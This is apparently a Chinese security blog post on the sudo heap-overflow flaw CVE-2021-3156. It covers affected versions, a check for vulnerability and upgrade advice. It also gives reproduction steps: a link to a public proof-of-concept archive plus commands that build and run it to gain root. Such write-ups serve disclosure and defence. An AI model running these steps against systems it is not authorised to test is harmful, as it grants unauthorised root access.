Linux sudo权限提升漏洞复现

  • Comments Off on Linux sudo权限提升漏洞复现
  • 14 views
  • A+

1. 漏洞背景

1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓

冲区溢出漏洞。当sudo通过 -s 或 -i 命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜

杠转义特殊字符。但使用 -s 或 -i 标志运行 sudoedit 时,实际上并未进行转义,从而可能导致缓冲区溢

出。因此只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获

得系统root权限。目前漏洞细节已公开,请受影响的用户尽快采取措施进行防护。

2.漏洞影响版本

Sudo 1.8.2 - 1.8.31p2

Sudo 1.9.0 - 1.9.5p1

不受影响版本:sudo =>1.9.5p2

3.漏洞检测

查看sudo版本

sudo --version

wKg0C2EfdYmAaPJfAABPp4fcga8386.png

检测是否存在漏洞,使用普通用户执行下面的命令

sudoedit -s /

若返回如图以“ sudoedit:”开头的错误,则当前系统可能存在安全风险。

不受影响的系统将显示以“ usage:”开头的错误

wKg0C2EfdbmANJUWAAAt8CY4nbw129.png

4.漏洞复现

本次复现使用的是kali,sudo版本为:1.8.27。

漏洞poc:https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz

tar -xvzf CVE-2021-3156_nss_poc_ubuntu.tar.gz

cd CVE-2021-3156/

make &&./sudo-hax-me-a-sandwich 0

wKg0C2EfduuASYreAAD1Y40XnSc921.png

5.漏洞修复

目前官方已在sudo新版本1.9.5p2中修复了该漏洞,请受影响的用户尽快升级版本进行防护,官方下载

链接:https://www.sudo.ws/download.html

注:建议用户在升级前做好数据备份工作,避免出现意外

参考文章:

【漏洞通告】Linux sudo权限提升漏洞(CVE-2021-3156)

【漏洞复现】CVE-2021-3156漏洞复现

相关推荐: Yapi远程命令执行复现&waf bypass

YApi是高效 、易用 、功能强大 的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以…